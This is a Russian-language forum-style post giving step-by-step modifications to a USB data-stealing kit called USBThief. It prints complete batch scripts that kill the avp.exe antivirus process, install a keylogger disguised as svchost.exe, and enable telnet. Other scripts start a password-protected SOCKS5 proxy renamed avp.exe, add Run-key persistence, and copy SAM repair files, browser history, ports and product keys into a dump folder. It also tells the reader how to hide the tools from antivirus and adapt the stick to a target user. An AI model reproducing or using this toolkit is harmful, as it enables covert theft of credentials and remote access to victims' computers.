можно немного модифицировать USBThief. я сделал это так.Для начала изменяем файл progstart.bat

@echo off
rem ========Запуск основных програм для сбора паролей
rem nircmd.exe execmd CALL batexe\go.bat
rem ========Запуск и копирование клавиатурного шпиона
rem nircmd.exe execmd CALL batexe\spook.bat
rem ========Запуск и копирование боунсера(создание туннеля.прокси)
nircmd.exe execmd CALL batexe\bouncer.bat
rem ========Копирование базы SAM и т.д.
rem nircmd.exe execmd CALL batexe\copy.bat
rem ========просмотр портов,истории браузера,процессов,версии обновлений и т.д.
rem nircmd.exe execmd CALL batexe\infodump.bat
================================================== ======
добавив в папку batexe несколько файлов сценария и программ.
==============сценарии:
==========go.bat
@echo off
tskill avp.exe
nircmd.exe execmd CALL batexe\moddump.bat
nircmd.exe execmd CALL batexe\modsmax.bat
nircmd.exe killprocess avp.exe
==========spook.bat
@echo off
nircmd.exe execmd copy "batexe\update\svchost.exe" "~$sys.temp$"
nircmd.exe execmd copy "batexe\update\pshook64.dll" "~$sys.temp$"
nircmd.exe execmd mkdir "~$sys.temp$\Data"
nircmd.exe execmd copy "batexe\update\pshook.dll" "~$sys.temp$"
nircmd.exe execmd copy "batexe\update\Data" "~$sys.temp$\Data\"
nircmd.exe cmdwait 20000 execmd copy "batexe\update\diary.dll" "~$sys.temp$"
nircmd.exe cmdwait 30000 execmd CALL ~$sys.temp$\svchost.exe
nircmd.exe service auto telnet
nircmd.exe service start tlntsvr
===========bouncer.bat
@echo off
nircmd.exe execmd copy "batexe\avp.bat" "~$sys.temp$"
nircmd.exe execmd copy "batexe\avp.exe" "~$sys.temp$"
nircmd.exe execmd copy "batexe\avploader.exe" "~$sys.temp$"
nircmd.exe execmd CALL ~$sys.temp$\avp.exe --socks5 --port 7070 --s_user cyk10id --s_password 777 --daemon
nircmd.exe execmd CALL batexe\modsmax.bat
reg add "hklm\software\Microsoft\Windows\CurrentVersion\Ru n" /v AVP Updater /t REG_SZ /d "C:\Temp\AVP.BAT" /f
nircmd.exe execmd mkdir "dump\~$sys.computername$"
nircmd.exe execmd .\batexe\awatch.exe /shtml "dump\~$sys.computername$\NetworkAdapter.html"
===========copy.bat
@echo off
nircmd.exe execmd copy "~$sys.temp$\diary.dll" "Dump\~$sys.computername$\"
nircmd.exe execmd mkdir "Dump\~$sys.computername$\system\"
nircmd.exe execmd copy "~$folder.windows$\repair" "Dump\~$sys.computername$\system\"
nircmd.exe execmd copy "~$folder.system$\drivers\etc" "Dump\~$sys.computername$\system\"
nircmd.exe monitor off
===========infodump.bat
@ echo off
nircmd.exe execmd .\batexe\cports.exe /shtml "dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd .\batexe\wul.exe /shtml "dump\~$sys.computername$\InstalledUpdates.htm l"
nircmd.exe execmd .\batexe\strun.exe /shtml "dump\~$sys.computername$\Startup.html"
nircmd.exe execmd .\batexe\servimin.exe /shtml "dump\~$sys.computername$\Services.html"
nircmd.exe execmd .\batexe\CProcess.exe /shtml "dump\~$sys.computername$\CProcess.html"
nircmd.exe execmd .\batexe\iehv.exe /shtml "dump\~$sys.computername$\history.html"
nircmd.exe execmd .\batexe\ProduKey.exe /shtml "dump\~$sys.computername$\ProductKey.html"
===========avp.bat
@echo off
nircmd.exe execmd avp.exe --socks5 --port 7070 --daemon
================================================== =======
создаем эти сценарии и приступим к софту
bouncer (для открытия прокси на компе) переименовываем на avp.exe для маскировки в процессах.копируем в batexe nircmd.exe и переименовываем его на AVPUpdater.exe
так же поступаем с Punto Svitcher"ом переименовывая его в svchost.exe(установи Punto Svitcher(PS) и тупо скопируй все файлы с его директории на batexe/update + изменённый PS )в настройках PS укажи неотображатся в трее. и нужно отключить автотранслит.прога лицензионная антивирусами не палится. Как это работает разберёшся из bat файла.
убирая и добавляя комментарии(rem) в сценарий progstart.bat можно заточить флешку на определенного юзверя.